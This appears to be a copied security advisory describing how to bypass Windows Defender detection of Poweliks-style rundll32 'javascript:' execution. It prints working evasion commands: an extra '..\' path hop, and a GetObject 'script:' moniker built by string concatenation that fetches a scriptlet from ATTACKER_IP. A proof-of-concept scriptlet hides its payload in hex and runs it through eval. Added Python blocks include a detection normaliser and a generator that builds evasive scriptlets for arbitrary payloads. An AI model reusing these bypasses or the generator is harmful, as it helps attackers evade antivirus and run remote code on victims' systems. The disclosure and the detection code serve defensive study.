G0dR4p3

0x01_WinDefender

Jan 11th, 2022
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A


[CVE Reference]
N/A


[Security Issue]
Currently, Windows Defender detects and prevents Trojan:Win32/Powessere.G (aka "Poweliks") style execution that leverages rundll32.exe with a javascript: URL. Attempts at execution fail
and the attacker gets an "Access is denied" error message. However, the detection is easily bypassed by adding one more path traversal hop ("..\") when referencing mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.

Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)

Windows Defender also detects the scriptlet loader call GetObject("script:http://ATTACKER_IP/hi.tmp") in the JavaScript.
However, that detection can be bypassed by building the "script:" URL scheme portion of the payload through string concatenation, so the literal "script:http" string Defender matches on never appears as one token.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.

Full bypass E.g.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

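From the defender's side, the three rundll32 command lines above show why a signature on the exact string fails: one extra "..\" or a split "script"+":" literal changes the bytes but not the behaviour. The following Python is an added example, not part of the advisory, that normalises a process command line (collapsing traversal runs and joining string-literal concatenation) before matching, and runs it over constructed sample command lines (the advisory's three plus a benign rundll32 invocation). The rule names and the normalisation steps are my own; it is an illustration, not a production detection.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# The first three are the command lines the advisory shows; the last is benign.
SAMPLE_CMDLINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

# "script"+":"+"http  ->  "script:http   (join adjacent string literals)
_CONCAT = re.compile(r'"\s*\+\s*"')
# \..\..\..\mshtml  ->  \mshtml           (any number of traversal hops)
_TRAVERSAL = re.compile(r'(?:\\\.\.)+\\')


def normalize(cmdline):
    """Canonicalise a command line so trivial evasions hit the same rule."""
    s = cmdline.lower()
    s = _CONCAT.sub('', s)          # undo string-literal concatenation
    s = _TRAVERSAL.sub(r'\\', s)    # collapse path traversal runs to one backslash
    s = s.replace('"', '')          # quotes carry no meaning for matching
    return re.sub(r'\s+', ' ', s)


def classify(cmdline):
    """Return the list of (hypothetical) rule names the command line triggers."""
    n = normalize(cmdline)
    hits = []
    # Poweliks-style loader: rundll32 + javascript: URL + mshtml,RunHTMLApplication
    if ('rundll32' in n and 'javascript:' in n
            and 'mshtml' in n and 'runhtmlapplication' in n):
        hits.append('rundll32-javascript-mshtml')
    # Remote scriptlet fetch via the script: moniker, even when the scheme was concatenated
    if 'getobject(script:' in n:
        hits.append('getobject-script-moniker')
    return hits


def scan(cmdlines):
    """Return (cmdline, hits) for every command line that triggers at least one rule."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


if __name__ == '__main__':
    for cmd, hits in scan(SAMPLE_CMDLINES):
        print(hits, '<-', cmd)
```

Feed it the CommandLine field of Sysmon Event ID 1 or Windows 4688 events. It still misses obfuscations it does not normalise (for example building the URL from char codes or variables), so pair string matching like this with behavioural signals such as rundll32.exe making outbound connections or spawning child processes.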
Enter the Backdoor:JS/Relvelshe.A detection.

Windows Defender also prevents execution of the downloaded code: the scriptlet is detected as "Backdoor:JS/Relvelshe.A" and removed by Windows Defender as soon as it lands in the IE cache (INetCache), e.g.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"

However, this is easily bypassed by hex-encoding the payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
The scriptlet then decodes it on the fly with String.fromCharCode(parseInt(hex.substr(n, 2), 16)) and passes the decoded string to JScript's built-in eval function.


[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426

Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904


[Exploit/PoC]
1) Remote JScript scriptlet component "hi.tmp": host it on a web server on port 80. It pops calc.exe using WScript.Shell and defeats the Backdoor:JS/Relvelshe.A detection.

python -m http.server 80

"hi.tmp"

<?xml version="1.0"?>
<component>
<script>
<![CDATA[
// Hex-encoded JScript: new ActiveXObject("WScript.Shell").Run("calc.exe")
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
// Decode two hex digits per character so the plaintext payload never appears in the cached file
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
// Hand the decoded string to JScript's built-in eval
eval(str)
]]>
</script>
</component>


2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")


BOOM!


[Network Access]
Local


[Severity]
High
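The hex string in hi.tmp is just the ASCII bytes of the payload, so it is straightforward to regenerate the scriptlet for a different JScript payload and to verify that the string decodes to what you expect. The following Python is an added example, not part of the advisory: it reproduces the encoding behind the hi.tmp above (the advisory's own JScript decode loop is kept verbatim in the template), offers a Python mirror of that decoder for checking, and emits the scriptlet on stdout. The script name in the usage note is hypothetical.

```python
import binascii

# The advisory's payload; encoding it must reproduce the hex string carried by hi.tmp.
PAYLOAD = 'new ActiveXObject("WScript.Shell").Run("calc.exe")'

# Windows Script Component template, identical in structure to the advisory's hi.tmp.
# Doubled braces are Python format escapes for the literal JScript braces.
SCRIPTLET_TEMPLATE = """<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "{hex}";
var str = '';
for (var n = 0; n < hex.length; n += 2) {{
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}}
eval(str)
]]>
</script>
</component>
"""


def hex_encode(js):
    """Upper-case hex of the ASCII bytes, the representation hi.tmp carries."""
    return binascii.hexlify(js.encode('ascii')).decode('ascii').upper()


def hex_decode(hexstr):
    """Python mirror of the JScript loop: two hex digits per character."""
    return ''.join(chr(int(hexstr[n:n + 2], 16)) for n in range(0, len(hexstr), 2))


def build_scriptlet(js):
    """Return the scriptlet text with the payload hex-encoded into the template."""
    return SCRIPTLET_TEMPLATE.format(hex=hex_encode(js))


if __name__ == '__main__':
    import sys
    sys.stdout.write(build_scriptlet(PAYLOAD))
```

Run it as `python gen_scriptlet.py > hi.tmp` (file name assumed) and serve the result with `python -m http.server 80` exactly as in step 1. Note that the encoding only hides the plaintext from a string match on the cached file; the decoded payload still executes through eval, so a sandbox or script-host hook that inspects evaluated code sees it unchanged.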